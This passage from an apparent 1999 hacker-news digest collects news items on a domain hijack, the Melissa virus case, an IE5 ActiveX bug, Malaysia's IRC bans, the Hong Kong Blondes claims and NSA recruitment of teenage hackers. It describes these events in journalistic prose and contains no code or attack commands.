disbelief,” he said. “One didn’t believe us until a marketing guy had his laptop taken out and it started sending weird packets.” Ruiu is convinced the hacks are coming from a coordinated team, because of their speed and variety. But while the cat-and-mouse game continues, he can only speculate on motive. His company, a 15-person startup called Netsentry.net, is hardly a big target. So Ruiu thinks his outside efforts in the security community are likely to blame. He recently worked on project called “Trinux,” which aimed to create a security-enhanced version of Linux that fits on one floppy disk. Among his partners was Ken Williams, who until recently ran Packet Storm Security, perhaps the most popular reference site in the hacker community. “I suspect these guys are targeting security software,” he said, but added they have not revealed their intentions. “This is really bugging me. The lack of a motive really disturbs me…it gave me the creeps.” The attacks have also been humbling for Ruiu, who has spent a lot of time chasing the hackers when he could be working to get his business off the ground. “There are a lot of assumptions we’re all making about Internet security that we shouldn’t,” he said. ”“There’s a lot of things we don’t know.” For example, these hackers made a habit of hijacking machines Ruiu’s computers normally talked to, then initiated attacks from these supposedly “friendly” computers. That made them almost impossible to detect. “If they get a machine that’s close to your machine, that’s almost as bad as taking over your Web server. It’s a great place to launch an attack on your firewall,” he said. Nothing about Ruiu or Pepelea’s stories surprised ICSA’s Tippett, who expects security problems to get worse before they get better. “It’s the wild, wild West out there,” he said. “The tools are pervasive and so common. The chance of getting caught is pretty slim… Our neighbors are now very close and enough of them don’t have a great social conscience.” A more extensive report on the one of these attacks, written by Ruiu, can be found at www.securityfocus.com. If you have more information about this story, e-mail tipoff@msnbc.com. @HWA 16.0 Japanese Police Go After Copyright Infringers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Hosimi The Akita Prefectural Police are investigating the activities of a civil servant who allegedly posted accounting software and MP3s to the internet in violation of copyright law. The suspect had all of his computer equipment confiscated last month. Asia Biz Tech http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/moren/79863 Akita Prefecture Police Pursue Internet Crime August 24, 1999 (TOKYO) -- The Akita Prefectural Police on Aug. 19 sent papers alleging unauthorized Internet program delivery to the Akita District Prosecutor's Office, for prosecution. The case is being pursued by the Kisakata Police Station. In the case, a male civil servant residing in Akita Prefecture is believed to have been engaged in unauthorized free delivery of personal computer programs and digital music data over the Internet. The man is suspected of infringing on the right of public transmission under the Copyright Law. According to the prefectural police, the man had registered accounting software of Obic Business Consultants Ltd. and MP3-based musical data on his home PC. He is suspected of having posted these programs on the Internet so that PC users can download them free of charge.

In June, the Kisakata Police Station investigated the man's house and confiscated his PCs and peripheral equipment. The police decided to send papers pertaining to the case to the district public prosecutor's office because the free delivery of PC software was deemed to be illegal, it said. The Japan Society of Rights of Authors and Composers has already accused the man of unauthorized delivery of musical data. The Akita Prefectural Police's task force specializing in high-tech crimes played a significant role in this investigation. To combat the increasing number of high-tech crimes, the National Police Agency is calling on prefectural police stations to organize task forces specializing in high-tech crimes, starting in the current fiscal year. The task force set up by the Akita police has reportedly contributed substantially to analysis of communications records and other matters related to the case. (BizTech News Dept.) @HWA 17.0 Anti-Gay Web domain Returned to Original Owner ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Code Kid Last week the web domain registration of www.godhatesfags.com was altered to point to the same people who own the www.godlovesfags.com. The change was accomplished by someone using an anonymous remailer with the internic registration database. The admins of www.godlovesfags.com has returned the domain to the original owner. CNN http://cnn.com/TECH/computing/9908/23/hack.folo/index.html Anti-gay site goes back to rightful owners August 23, 1999 Web posted at: 4:52 PM EDT (2052 GMT) By D. Ian Hopper CNN Interactive Technology Editor As slowly as it came, the road to love veered back to hate on an anti-gay Web site run by Pastor Fred Phelps of the Westboro Baptist Church in Topeka, Kansas. Last Wednesday, domain name registrar Network Solutions’ Internic directory was fooled to associate the godhatesfags.com domain name with the server containing godlovesfags.com, a pro-gay site. Kris Haight, a systems administrator at Sugar-River.Net, a New Hampshire Internet service provider, still maintains that he did not make the change himself, and was the beneficiary of a still-anonymous hacker. His site received about 70,000 page views after the switch, which had only received a total of 7,500 page views prior to Wednesday. Haight finally relinquished the name on Friday, after pressure from his employer and his employer’s service provider, a larger Internet provider which sells connectivity to the smaller ISP. According to Haight, a lawyer from the Phelps organization contacted the larger provider, Destek Networking Group of Nashua, New Hampshire, and threatened action. Destek then contacted Haight. Haight then attempted to contact Phelps, leaving a message telling Phelps to check his e-mail for a notice from Internic that the domain name was pointed back to the original host server. Phelps' organization refused to confirm the call to Destek, and continued to downplay the incident. “It hasn’t hurt us one iota,” said Shirley Phelps-Roper, Fred Phelps’ daughter and a lawyer for the organization. “It demonstrated to the world that fags are what we said they are. These experiences confirm what the scripture says about them. They are lawless; nothing is sacred with them.” T. Parsinnen, owner of Sugar-River.Net and Haight’s employer, said he knew nothing of the change until after it happened. “We received an e-mail giving a server change to godhatesfags, “ Parsinnen explained, “But I didn’t notice anything in particular. I thought, ‘Oh, that’s Kris’s domain, I don’t have to do anything about it.’ It was so close that it didn’t register to me what it actually was.” The next day, Kris told him what he did. “I said, ‘You’re going to have to give that back,’ and he said he would.” Parssinen said he doesn’t anticipate any legal action and will continue to host the godlovesfags Web site. Haight is leaving the company for another job opportunity. According to Parssinen, it’s just in time. “To demonstrate to everybody that we had nothing to do with what took place, we would have been forced to terminate his employment.” A mystery remains, though. Who made the switch? Parssinen said he doesn’t think Haight knew how to do it himself, and Haight refuses to give any more information about the e-mail that told him to watch for the switch, other than it was from an anonymous remailer. There’s plenty of speculation, however, ranging from a Phelps ploy to sabotage himself in order to get more media attention, to a result of the recent Chaos Communication Camp in Germany, to a challenge made to hackers to reassign a set of domain names. Nevertheless, Network Solutions spokesperson Nancy Huddleston said that there are three levels of domain name security, and relatively few choose the highest level, password encryption. With that level, this sort of domain redirection wouldn’t have been nearly as easy to do. “We just sent another alert to our users telling them about the three levels of security,” Huddleston said. Even with more security, it seems almost inevitable that high-profile and controversial sites will continue to be a prime target for attention-hungry hackers. Phelps-Roper has resigned herself to that fact, reporting that the godhatesfags site has been a target many times before, usually with denial-of-service attacks. You know there’s 365 days in a year, Phelps-Roper said, If we’re down 3, we’re still up the rest. We don’t really care. (Gotta love their attitude, this kills me... bahahaha - Ed) @HWA 18.0 EXPLOIT-DEV Mailing List Started ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ryan In an effort to promote discussion on potential or undeveloped holes a new mailing list has been created by the folks at Security Focus. The list will be dedicated to interactively developing exploits. Security Focus http://www.securityfocus.com/forums/exploit-dev/faq.html We are pleased to host a new security mailing list that may be of interest BUGTRAQ subscribers. What is EXPLOIT-DEV? There are many forums for reporting security bugs and distributing exploit code or examples. A prime example of such a forum is the BUGTRAQ mailing-list. However, nearly all of these forums exist mostly for the dissemination of fully-researched reports, and they leave little room for discussion. In addition, many bugs are spotted not written-up, due to lack of interest, time, or expertise. The EXPLOIT-DEV list exists to allow people to report potential or undeveloped holes. The idea is to help people who lack expertise, time, or information about how to exploit a hole do so. The EXPLOIT-DEV list is dedicated to the concept of full disclosure. We believe that release of exploit code serves the security community overall. Since the list is dedicated to interactively developing exploits, there will there will generally NOT be an opportunity to warn software vendors or authors. In many cases it will not be clear that there is a problem until the exploit or description is finalized, at which point all list subscribers will know. It is very appropriate to notify vendors or authors as soon as it is clear there is a problem. For more information read http://www.securityfocus.com/forums/exploit-dev/faq.html To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of: SUBS EXPLOIT-DEV Firstname Lastname -- Elias Levy Security Focus http://www.securityfocus.com/ @HWA 19.0 NetBus - Product Under Siege ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Judd UltraAccess.net, the company that makes NetBus Pro, is lashing out against Anti-Virus vendors for restricting sales of its product by labeling the software as a virus. Net Bus Pro 2.1 is a remote administration tool similar to Back Orifice that allows an administrator to control a remote system. UltraAccess.net is claiming that AV vendors like Symantec think that NetBus is competition for their remote administration software and that is why it is being flagged by the AV software. UltraAccess says that unless some sort of agreement can be reached they may purse legal action against AV companies for defamation and restraint of trade. UltraAccess.net http://www.ultraaccess.net @HWA 20.0 Worst Security Hole Ever? ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond This new hole in Internet Explorer 5 allows an infocriminal to place a program on a victim's hard disk that will be executed at the next reboot. The bug can be exploited from a user opening a web page or reading an email. The problem is located with an Active X control called "Object for constructing type libraries for scriptlets". Microsoft is working on a fix, in the meantime users are urged to turn off Active X within their browsers. (Sure glad I use Netscape.) George Guninski's Home Page - Demo and Source Code Available http://www.nat.bg/~joro/ Internet News http://www.internetnews.com/prod-news/print/0,1089,9_188461,00.html New IE5 Security Bug the Worst Ever? August 24, 1999 Brian McWilliams, InternetNews.com Correspondent Product News Archives Bulgarian browser bugmeister Georgi Guninski is at it again. The 27-year-old independent computer consultant has discovered a new security flaw affecting Internet Explorer 5, which enables a malicious hacker to place a program on the victim's hard disk, to be executed at the next reboot. Guninski is credited by Microsoft with discovering and publicizing a number of significant security flaws in its Internet Explorer browser in the past year. While he's also spotted several security bugs in Netscape's Navigator, Guninski is especially fond of poking holes in Active X, the scripting technology used in IE. "I think this is the most significant of my discoveries and the most dangerous also," Guninski told InternetNews Radio. "It allows a Web page or e-mail message to take control of the computer and do anything." According to Guninski, the attack can be launched by causing IE5 users to click on a hyperlink on a web page, but it also can be transmitted by e-mail to users of Microsoft's Outlook 98. The exploit places an executable program in an HTML Application file in a Window 95 or 98 computer's start-up folder. When the victim reboots his or her computer, the program will execute. Guninski said the problem lies in an Active X control called "Object for constructing type libraries for scriptlets". He has posted a demo and source code of the exploit at his Web site. Microsoft officials were not immediately available for comment. Guninski asserts that the company has reproduced the bug and plans to issue a patch. In the meantime, concerned IE5 users can protect themselves by going into security tab of the browser's Internet Options menu, and disabling ActiveX controls or plug-ins. @HWA 21.0 IRC Banned in Malaysia ~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by AlienPlague Undernet, EFnet and DALNet, Internet Relay Chat Networks, had banned users from Malaysia for seven days last week. Both of Malaysia's Internet service providers Jaring and TMNet ISPs had been banned from using the networks effectively cutting off the entire country. The ban was due to users in the country abusing the networks services. After discussions with both ISPs the ban was lifted last Friday. South China Morning Post http://www.technologypost.com/internet/Daily/19990824110643506.asp?Section=Mai INTERNET Malaysians banned from global IRC network NEWSBYTES Undernet, a worldwide Internet Relay Chat (IRC) network that allows people to connect to its privately-run computer servers free of charge to communicate in real time over the Internet, has banned Internet users from both of Malaysia's only two Internet service providers (ISPs) for abusing its services. Although Undernet is one of many IRC networks, it is one of the largest and joins two of the other largest - DALNet and EFnet - in instituting temporary or permanent bans on Internet users logging on from the Jaring or TMNet ISPs in Malaysia. Bans typically run for several hours to days or weeks depending on the network and the level of abuse and the response of ISPs to complaints from IRC network administrators. Within the IRC community, abusive behaviour ranges from repeated offensive behaviour toward other users, automatically flooding chat rooms with multiple messages, running robot programs and launching denial of service attacks against other users or the servers themselves (basically, trying to hack the system and bring it down). Because Internet users often connect from dial-up connections it is impossible for IRC networks to identify and ban an individual user as they can just log out and return with a different IP address. This is where IRC administrators ask ISPs for assistance with serious offenders who do not respond to IRC operators requests to cease online. Since the ISP can connect an IP address at any point in time to a particular user, they are in a position to pass on a warning or even account termination if hacking is against the ISP's terms of service, which is the case for most ISPs worldwide. IRC networks do not usually take the next step and ban a whole ISP's domain, and so all of its users guilty and innocent, unless the ISP is unresponsive to abuse reports. Undernet found that Jaring and TMNet administrators ignored abuse reports and so they were forced to ban all users from both services for seven days last week. "In the last few months alone, over 182,300 global bans have been set against various address's in the *@*.my domain," read an Undernet.org e-mail sent to Jaring and TMNet. "We simply cannot afford to absorb the costs of these attacks any longer. "We must either reach some form of working, responsible relationship with the administrators of the various *.my providers, or these bans will become permanent. "Basically, we are only asking that they support and enforce their own policies they have in place already." Undernet lowered the bans against Jaring on Friday after some discussion between the two organisations. The network presented the ISP with a list of requests and suggestions for abuse management. TMNet, the ISP arm of national telco Telekom Malaysia, had not contacted Undernet on Friday and on Sunday a permanent ban was placed on the TM.net.my IP space. Undernet officials said that the bans were not about Malaysian Internet users being particularly worse behaved than any other country's. They said it was about "irresponsible and unresponsive administration of the Malaysian ISPs". "We are not singling out Malaysia, but it is in general is the most abusive domain currently accessing the Undernet," said Undernet. "Malaysian IP space and resources are being used to launch denial of service attacks and the last attack against one of our routing servers was the straw that broke the camel's back." Undernet estimated it costs its hosts US$2.2 million in bandwidth alone to run the Undernet network each year. At times more than 30,000 users are connected simultaneously from all around the world. @HWA 22.0 I want my, I want my, I want my HNN - more goodies from HNN ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue Monday HNN announced that the new Java HNN News Ticker is available on the Affiliate Resources page. Today we are happy to announce several new ways which you can receive your HNN. With our new XML backend we now have channels on My Netscape and My Userland. This is in addition to our box on Slashdot and our previously announced PQA for the Wireless Palm Pilot. We've got even more features in the works so keep your eyes open. I want my HNN http://www.hackernews.com/misc/myhnn.html @HWA 23.0 Melissa Creator Admits Guilt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid David L. Smith, the man who has been charged with creating and disseminating the Melissa virus, admitted to investigators that he did it, according to court papers. Lawyers for the defense dispute that an admission of guilt was made. Smith has pleaded not guilty to charges of interrupting public communication, conspiracy, theft of computer service, and wrongful access to computer systems. David Smith remains free on $100,000 bail. C|Net http://www.news.com/News/Item/0,4,40912,00.html?st.ne.fd.mdh.ni Nando Times http://www.nandotimes.com/technology/story/body/0,1634,85786-135501-944958-0,00.html CNN http://www.cnn.com/US/9908/25/melissa.virus.ap/index.html C|Net; Court papers: Smith admits to creating Melissa virus By Erich Luening Staff Writer, CNET News.com August 25, 1999, 8:25 a.m. PT update The New Jersey man charged with creating the Melissa virus, which disrupted computers around the world, admitted to investigators that he did it, according to court papers. On April 1, David L. Smith was arrested by federal and state officials and charged with creating and disseminating the Melissa virus that began spreading across the Internet March 26. Smith, 30, a resident of Aberdeen Township, New Jersey, was arrested at the home of his brother in Eatontown, New Jersey. Smith was tracked down with the help of America Online and by traced phone calls. A spokesman for the New Jersey Attorney General's office told CNET's News.com that the prosecution "expects to see some kind of resolution by September." He would not elaborate further. A brief filed in state superior court by supervising deputy attorney general Christopher G. Bubb said Smith waived his Miranda rights and spoke to investigators when police arrived at his apartment, according to a courthouse spokesperson. Smith admitted to writing the "Melissa" macro virus, illegally accessing America Online for the purpose of posting the virus onto the Internet, and destroying the personal computer he used to post the virus, Bubb stated. The state attorney filed his brief in response to a motion made by Smith’s attorney Edward F. Borden Jr. seeking certain prosecution documents. The FBI continues to provide assistance to New Jersey prosocuters in the case. Federal charges have not been levied against Smith. "The decision to bring federal charges against Smith is at the descretion of the U.S. Attorney," said FBI spokesperson Debbie Weierman. In April, Smith pleaded not guilty to charges of interrupting public communication, conspiracy to commit the offense, and the attempt to commit the offense. He also pleaded not guilty to charges of two lesser offenses: theft of computer service and wrongful access to computer systems. If convicted on the state charges, Smith faces a maximum of 40 years in prison and fines of $480,000. AOL tipped the New Jersey attorney general's office to the virus's originator. AOL said it had tracked the source through a listserver to Monmouth County, New Jersey. Since his arrest, Smith has changed attorneys. The Melissa virus was first introduced on an "alt.sex" newsgroup using the AOL account of Scott Steinmetz, whose username was "skyroket." Steinmetz, a civil engineer in Lynnwood, Washington, told CNET News.com that he had nothing to do with writing or introducing the virus. The virus used a combination of Microsoft's Outlook and Word programs to spread, taking advantage of users' email address book entries to gain the appearance of coming from a known person. Smith remains free on $100,000 bail. Nando Times; Accused admitted creating 'Melissa' virus, prosecutor says Copyright © 1999 Nando Media Copyright © 1999 Associated Press From Time to Time: Nando's in-depth look at the 20th century. FREEHOLD, N.J. (August 25, 1999 10:57 a.m. EDT http://www.nandotimes.com) - The man charged with creating the Melissa computer virus that clogged e-mail systems around the world last spring admitted he created the bug, a prosecutor alleges in court papers. David L. Smith, a former computer programmer, was arrested in April. A brief filed in state Superior Court by Supervising Deputy Attorney General Christopher G. Bubb says Smith waived his Miranda rights and spoke to investigators when police arrived at his apartment. "Smith admitted, among other things, to writing the 'Melissa' macro virus, illegally accessing America Online for the purpose of posting the virus onto cyberspace, and destroying the personal computers he used to post 'Melissa,'" Bubb wrote. Defense lawyer Edward P. Borden Jr. told the Asbury Park Press of Neptune that he disputes Bubb's assertions. He refused to comment further, the newspaper reported Wednesday. The Melissa virus was disguised as an e-mail marked "important message" from a friend or colleague of each recipient. It caused affected computers to create and send 50 additional infected messages. The volume of messages generated slowed some systems to a crawl. Authorities say the virus was named after a topless dancer in Florida. Bubb's brief was filed in response to a defense motion seeking additional prosecution documents. Borden says he needs the prosecution documents to file a motion to suppress evidence seized during the search of Smith's apartment. A hearing on his motion was to be held Wednesday afternoon. Smith is charged with interruption of public communications, conspiracy and theft of computer service. The maximum penalty for the offense is 40 years in prison. He remains free on $100,000 bail. CNN; Prosecutor says man admitted creating 'Melissa' computer virus August 25, 1999 Web posted at: 10:49 AM EDT (1449 GMT) FREEHOLD, New Jersey (AP) -- The man charged with creating the Melissa computer virus that clogged e-mail systems around the world admitted he created the bug, a prosecutor alleges in court papers. David L. Smith, a former computer programmer, was arrested in April. A brief filed in state Superior Court by Supervising Deputy Attorney General Christopher G. Bubb says Smith waived his Miranda rights and spoke to investigators when police arrived at his apartment. "Smith admitted, among other things, to writing the 'Melissa' macro virus, illegally accessing America Online for the purpose of posting the virus onto cyberspace, and destroying the personal computers he used to post 'Melissa,' " Bubb wrote. Defense lawyer Edward P. Borden Jr. told the Asbury Park Press of Neptune that he disputes Bubb's assertions. He refused to comment further, the newspaper reported today. The Melissa virus was disguised as an e-mail marked "important message" from a friend or colleague of each recipient. It caused affected computers to create and send 50 additional infected messages. The volume of messages generated slowed some systems to a crawl. Authorities say the virus was named after a topless dancer in Florida. Bubb's brief was filed in response to a defense motion seeking additional prosecution documents. Borden says he needs the prosecution documents to file a motion to suppress evidence seized during the search of Smith's apartment. A hearing on his motion was to be held Wednesday afternoon. Smith is charged with interruption of public communications, conspiracy and theft of computer service. The maximum penalty for the offense is 40 years in prison. He remains free on $100,000 bail. @HWA 24.0 cDc Responds to Allegations About HKBs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Oxblood Ruffin, from the Cult of the Dead Cow, gives an interview about the existence of the Hong Kong Blondes. The HKBs are a group of Chinese dissidents who are trying to destabilize the Chinese Government through the Internet. Last week a report was issued that there was no evidence to support their existence and concluded that therefore they must not exist. IT Daily http://www.itdaily.com/daily.lasso?-database=dailybasepublic&-layout=today&-response=itdailyfree.htm&-recid=39830&-search Thursday, August 25, 1999 Cult claims Hong Kong hackers are real threat US hackers respond to itdaily.com story By Neil Taylor Leading US hacker group the Cult of the Dead Cow has told itdaily.com that elusive Chinese hackers the Hong Kong Blondes are operating in Asia. According to the CDC, the Blondes are a group of Chinese dissidents who aim to destabilise the Chinese Government through the Internet. Along with an offshoot named the Yellow Pages, the group threatened to use information warfare to attack China's information infrastructure. The group threatened to attack both Chinese state-owned organisations and Western companies investing in the country. When the group was first reported, the CDC claimed to be training the Blondes in encryption and intrusion techniques. A recent investigation by itdaily.com found no evidence of the group's existence. Despite approaching the Hong Kong ISP Association, the Hong Kong Government, Police, universities, security experts and hackers alike, nobody contacted by itdaily.com knew anything about the group. However, CDC foreign minister OXblood Ruffin told itdaily.com that the Hong Kong Blondes are for real, and that they are operating in Asia. The chief organisers, nicknamed Blondie Wong and Lemon Li, were last reported to be based in India. "The Blondes do exist, although the CDC has truncated our official relationship with them," said Ruffin. "The Yellow Pages on the other hand briefly existed but were shut down by me." Ruffin said that the reason the group has been so low-key is that they operate secretly to avoid compromising members in China "They're hyper secure. They're organised in cells of three members with no one but Blondie and Lemon knowing the entire membership." The CDC has portrayed the Hong Kong Blondes as "hacktivists"; meaning they break into computer networks for political ends. "The Yellow Pages got together and they were gonna do support work to draw attention to social justice issues in China linked to current trading practices on the Western side..." Ruffin said that he later learned that the group planned to shut down the networks of a number of large US corporations, at which point he decided to disband the group and disassociate himself with the Hong Kong Blondes. "The American public would not have supported any such adventure and it would have worked seriously against the cause," he said. He added that the CDC no longer maintains any relationship with the group. As previously reported in itdaily.com, the first and only Hong Kong Blondes interview was leaked to the press by the CDC just one month before the group released its well-known remote administration tool Back Orifice. BO can be installed on a Windows PC without the user's knowledge, giving full control over the machine to unauthorised third parties. Since then, Back Orifice has become widespread internationally, particularly in China. There is still no evidence beyond the word of OXblood Ruffin that the Hong Kong Blondes do, in fact, exist, but as Ruffin's e-mail signature notes: "First we take the networks, then we take Peking." @HWA 25.0 $50G Offered in 'Hacker Challenge' Publicity Stunt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Yazmon Global Markets Research (GMR), a UK company, has offered $50,000(US) to anyone who can break their proprietary email system within three months. The company designed 1on1 e-mail "to guarantee complete confidentiality", the program uses 2048 bit encryption while email is in transit and can autodelete email after it has been read. BBC http://news.bbc.co.uk/hi/english/sci/tech/newsid_430000/430084.stm 1 on 1 Mail http://1on1mail.com HNN has stated its feelings about these 'Hacker Challenges' before. These should not be considered adequate testing methods. Reasons, 1) Most people with the knowledge to break systems like this are busy making bigger money elsewhere, 2) The real bad guys don't want to give away their secrets, 3) this is not a controlled environment conducive to good research. If companies want publicity and a good test of their security then they should hire someone like NMRC, Phar Lap, L0pht, eEye, or any other independent third party security experts to review their software. NMRC.....: http://www.nmrc.org Phar Lap.: http://www.pharlap.com/ L0pht....: http://www.l0pht.com eEye.....: http://www.eeye.com/ BBC: Thursday, August 26, 1999 Published at 08:15 GMT 09:15 UK Sci/Tech The self-destructing e-mail Providing secure e-mail is a growing business A new program can send e-mail messages which self-destruct after a set time. Its developers claim this will protect senders from having ill-judged electronic words used against them later. The most high-profile instance came last year when Microsoft's Bill Gates had to defend himself against his own e-mails in a US antitrust case. Hack it if you can UK company Global Markets Research (GMR) designed 1on1 e-mail "to guarantee complete confidentiality". It uses 2,048-bit public key encryption to secure the message in transit and GMR have such confidence in it that they are offering $50,000 to anyone who can hack into a message within three months. The self-destruct feature is called autoshredder and the package also prevents recipients from just cutting and pasting out of it. "That would be pointless," GMR's technical director, Steven James told New Scientist magazine. 1on1mail also ensures that the e-mail is not stored anywhere on the recipient's computer. Finally, when the message self-destructs, it is overwritten on the disk, so it cannot be undeleted later. Gimmick jibe However, critics have been quick to give their views. "2,048-bit encryption is ridiculous," cryptographer Bruce Schneier told technical news Website ZDNN. "It is irrelevant. The security is determined by the password anyway. If the user picks a bad one, the security is bad." Hushmail, a rival encrypted e-mail service, dismissed the self-destruct feature as a gimmick. Another fear is that e-mails used to send viruses or trojans could destroy themselves along with any evidence. @HWA 26.0 NSA Recruiting In the Underground ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ender The National Security Agency has been actively recruiting at least one member of the underground community. Ender Wiggin, editor of OSAll web site has received offers for free tuition to a four year college, salary, and room and board, in exchange for working for the NSA for five years after graduation. After noticing the NSA was visiting his web site he sent an inquiring email and then received the offer to join this program. OSALL - NSA and Kids http://www.aviary-mag.com/News/NSA_and_Kids/nsa_and_kids.html OSALL - Ender and CNN http://www.aviary-mag.com/News/CNN/cnn.html The NSA is actively recruiting high school kids, offering to pay for college -- and a salary to boot. The NSA and Kids Mike Hudack Editor-in-Chief They were visiting the Web site daily. Every day they downloaded all the new files and left. Who were they? The National Security Agency. The NSA was created in the fifties with a mandate to read other nations´ mail and keep our mail from being read. Since then they´ve moved into computer security in addition to their original cryptology. Curious, I sent an e-mail to the registered custodian of the address visiting the site. It must have been referred around the mulberry bush because someone else answered. "Do you know about our college programs?" this new person asked... I didn´t. Apparently the NSA actively recruits students in high school (only local to Fort Meade) and college. The NSA employee asked for my address and received it. About two weeks later I received a hand-addressed manila envelope (which has been broadcast on CNN) containing a series of glossy recruitment brochures touting an "opportunity the brightest students cannot afford to miss." They had no idea about my academic qualifications when they told me about the program -- or at least I didn´t tell them. My academic credentials are, however, quite good with the exception of attendance. About a week after I received the brochures I received another e-mail from this NSA employee who I was now recognizing as a recruiting officer. He told me that I could "definately get into the program," and that I would be able to go to "any college [I] want," suggesting they could get me into the colleges. Since then he´s e-mailed me almost weekly asking if I´ve applied. This happened to me almost half a year ago now, and I´ve since spoken to others who have been the subject of recruiting efforts. One teenager told me "they were very enthusiastic. Kept telling me how I could get paid for going to college... They sounded like the Army." And well they should -- they are part of the Department of Defense. The offer is pretty simple, and anyone can apply. If you plan to study computer science, electrical or computer engineering, mathematics or language in college, the NSA will allow you to apply. You must have at least a 1200 on your SATs and a 3.0 GPA. In return for four years of college, a salary, room and board, you must work for NSA for five years post-graduation. Most of the people the NSA is targetting in this recruiting program seem to have problems with the idea. Most, including me, disagree with the NSA´s cryptology policies (read: key escrow and export limitations). Likewise, however, the opportunity is certainly an amazing one. Related Links: National Security Agency http://www.nsa.gov NSA Names Schools http://www.aviary-mag.com/News/Old_News/NSA_Colleges/nsa_colleges.html Ender & CNN Mike Hudack Editor-in-Chief Mike Hudack, aka Ender Wiggin, editor of OSAll, was profiled on the Cable News Network beginning on Monday. The entire profile will run on Saturday on CNN at 1:30pm eastern time. The story focuses on the fact that I´ve been actively recruited by the National Security Agency. To find out more about it you´ll have to watch :-) A segment of the story originally ran on CNN Headline News on Monday, repeating every half hour. Subsequently it ran on CNN World Today at 10pm eastern. It ran again on CNN´s morning show on Tuesday morning. The idea behind the story is to make a positive impact on the media and public´s understanding of hackers. It is meant to "break the hacker stereotype." As a CNN anchor said, you "may remember the movie War Games. Now the government is remaking the image of hackers." I will be interviewed by FOX News on Wednsday night to air on Labor Day Weekend. The focus of the FOX story will be similiar -- with a focus on breaking the hacker stereotype and emphasizing the positive side of hackers. Likewise, I have been in discussions with an NBC channel for a similiar story. I´ve previously been quoted or pictured in magazines such as US News & World Report and PC World on security subjects. The US News article was likewise focused on changing the attitude about hackers. Since the CNN story started running I´ve been swamped by hundreds of e-mails from everyone from venture capitalists to former NSA employees. All have been very supportive, and I thank them very much. Related Links: OSAll BBSystem http://www.aviary-mag.com/bbsystem National Security Agency http://www.nsa.gov Cable News Network http://www.cnn.com CNN Transcript of Partial Segment http://cnn.com/TRANSCRIPTS/9908/23/wt.06.html FOX News Network http://www.foxnews.com NBC http://www.nbc.com US News & World Report http://www.usnews.com PC World Magazine http://www.pcworld.com Transcript: World Today Teenage Hacker Gets Attention of NSA Aired August 23, 1999 - 10:51 p.m. ET THIS IS A RUSH TRANSCRIPT. THIS COPY MAY NOT BE IN ITS FINAL FORM AND MAY BE UPDATED. JOIE CHEN, CNN ANCHOR: Perhaps you'll remember the movie "War Games," which told the story of a cyberwhiz who was pursued by the Pentagon and CIA because of his hacking activities. Now some parallels in the life of a real-life teen now being targeted by a key security agency. The details from CNN's Ann Kellan. (BEGIN VIDEOTAPE) ANN KELLAN, CNN CORRESPONDENT (voice-over): He's your typical teenager -- hangs out with friends, loves pizza, argues with his parents that he really is old enough to drive. So why would the government's top-secret national security agency, the NSA, be interested in Mike Hudak? This 16-year-old is a computer whiz kid, a hacker. MIKE HUDAK III, COMPUTER HACKER: Most hackers are not malicious. They're good people. KELLAN: Mike was 12 when he bought his first computer and immediately, and legally, hacked it. HUDAK: One of the first things I did with it is I took it apart and then put it back together. And I was praying, you know, and it worked. KELLAN: He even set up his own hacker news Web site. The NSA noticed it. HUDAK: They visited my site every day, and I can tell from site logs. So I e-mailed them, and they e-mailed me back, telling me about their recruitment program. KELLAN: The NSA wouldn't comment on camera, but off-camera says it recruits students like Mike and will pay four years college tuition, room and board, even pay a salary. In exchange, students work summers and at least five years after college for the NSA. HUDAK: Don't use all caps. Turn off caps lock. KELLAN: It's tempting for someone like Mike, who babysits everyday after school and during the summer to make a buck. But then he wonders if he can work for the NSA when he disagrees with some its policies. HUDAK: I would have to think long and hard before I did it. KELLAN: Not your typical computer hacker stereotype. HUDAK: This made it into the dictionary this year. KELLAN: Mike's parents are proud of his accomplishments, but dad wants mike to be a doctor. MIKE HUDAK II, MIKE'S FATHER: I love what he's doing now, but I think with his ability he could be a hell of a surgeon. HUDAK: No, I've always -- the sight of blood has always made me weak in the knees. KELLAN: Mike, at 16, wants a career where fun and money go hand in hand. Ann Kellan, CNN, Fairfield, Connecticut. (END VIDEOTAPE) TO ORDER A VIDEO OF THIS TRANSCRIPT, PLEASE CALL 800-CNN-NEWS OR USE OUR SECURE ONLINE ORDER FORM LOCATED AT www.fdch.com -=- http://cnn.com/TECH/computing/9908/26/t_t/teen.hacker/index.html Federal agency recruits hacker teens August 26, 1999 Web posted at: 11:21 a.m. EDT (1521 GMT) FAIRFIELD, Connecticut (CNN) -- What image comes to mind when you hear the word hacker? If it's someone evil or malicious, somebody breaking into computers illegally, you're only partly right. For instance, Mike Hudack is your typical teenager. He hangs out with friends, loves pizza and argues with his parents that he really is old enough to drive. So why would the National Security Agency be interested in him? Because this 16-year-old is a computer whiz, a hacker. "Not every hacker, not everyone who calls themselves a hacker, is a bad person," Mike says. "Most hackers are not malicious. They are good people." Mike was 12 years old when he bought his first computer. "And I took it home, and I loved it so much," Mike says. "One of the first things I did with it is I took it apart and then put it back together." He even set up his own hacker news Web site, offering security advice to government agencies. That is how he got the NSA's attention. "They visited my site every day and I e-mailed them, they e-mailed me back, telling me about their recruitment program," Mike says. The NSA says it recruits students like Mike and will pay four years of college tuition, room and board and even a salary. In exchange, students work summers and at least five years after college for the NSA. It's tempting for someone like 